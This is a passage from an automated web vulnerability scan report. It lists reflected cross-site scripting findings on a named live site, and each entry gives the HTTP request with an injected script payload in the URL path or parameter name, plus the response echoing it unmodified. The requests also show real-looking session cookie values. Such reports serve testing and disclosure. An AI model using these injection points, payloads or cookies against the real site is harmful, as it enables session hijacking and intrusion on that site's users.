The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ddb"><script>alert(1)</script>da6720f4a77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E?16ddb"><script>alert(1)</script>da6720f4a77=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:39 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:39 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:40 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00018B)%3C/script%3E?16ddb"><script>alert(1)</script>da6720f4a77=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.96. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%22ns=%22netsparker(0x000196)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c063"><script>alert(1)</script>9c9fdc8481d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e5c063"><script>alert(1)</script>9c9fdc8481d/%22ns=%22netsparker(0x000196) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:31 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:31 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e5c063"><script>alert(1)</script>9c9fdc8481d/%22ns=%22netsparker(0x000196)" method="post" accept-charset="utf-8">
...[SNIP]...

1.97. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%22ns=%22netsparker(0x000196)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a509"><script>alert(1)</script>0e255d375af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%22ns8a509"><script>alert(1)</script>0e255d375af=%22netsparker(0x000196) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%22ns8a509"><script>alert(1)</script>0e255d375af=%22netsparker(0x000196)" method="post" accept-charset="utf-8">
...[SNIP]...

1.98. http://my.alltop.com/alpha/e/%22ns=%22netsparker(0x000196) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%22ns=%22netsparker(0x000196)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce099"><script>alert(1)</script>e9db9f13b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%22ns=%22netsparker(0x000196)?ce099"><script>alert(1)</script>e9db9f13b=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:26 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:27 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:27 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%22ns=%22netsparker(0x000196)?ce099"><script>alert(1)</script>e9db9f13b=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.99. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59182"><script>alert(1)</script>e874764ccd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e59182"><script>alert(1)</script>e874764ccd6/%2522ns%253D%2522netsparker%25280x0001A8%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e59182"><script>alert(1)</script>e874764ccd6/%2522ns%253D%2522netsparker%25280x0001A8%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.100. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36afd"><script>alert(1)</script>1bea4c37bfc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)36afd"><script>alert(1)</script>1bea4c37bfc HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)36afd"><script>alert(1)</script>1bea4c37bfc" method="post" accept-charset="utf-8">
...[SNIP]...

1.101. http://my.alltop.com/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac09"><script>alert(1)</script>90ad980318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)?cac09"><script>alert(1)</script>90ad980318c=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:48 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:48 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/e/%2522ns%253D%2522netsparker%25280x0001A8%2529)?cac09"><script>alert(1)</script>90ad980318c=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.102. http://my.alltop.com/alpha/f ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001B5)</script> request parameter is copied into the HTML document as plain text between tags. The payload 5ba6a<script>alert(1)</script>3a9b6533f38 was submitted in the '"--></style></script><script>netsparker(0x0001B5)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f?'"--></style></script><script>netsparker(0x0001B5)</script>5ba6a<script>alert(1)</script>3a9b6533f38 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>5ba6a<script>alert(1)</script>3a9b6533f38" method="post" accept-charset="utf-8">
...[SNIP]...

1.103. http://my.alltop.com/alpha/f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40afb"><script>alert(1)</script>655b90c610e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f40afb"><script>alert(1)</script>655b90c610e HTTP/1.1
Referer: http://my.alltop.com/
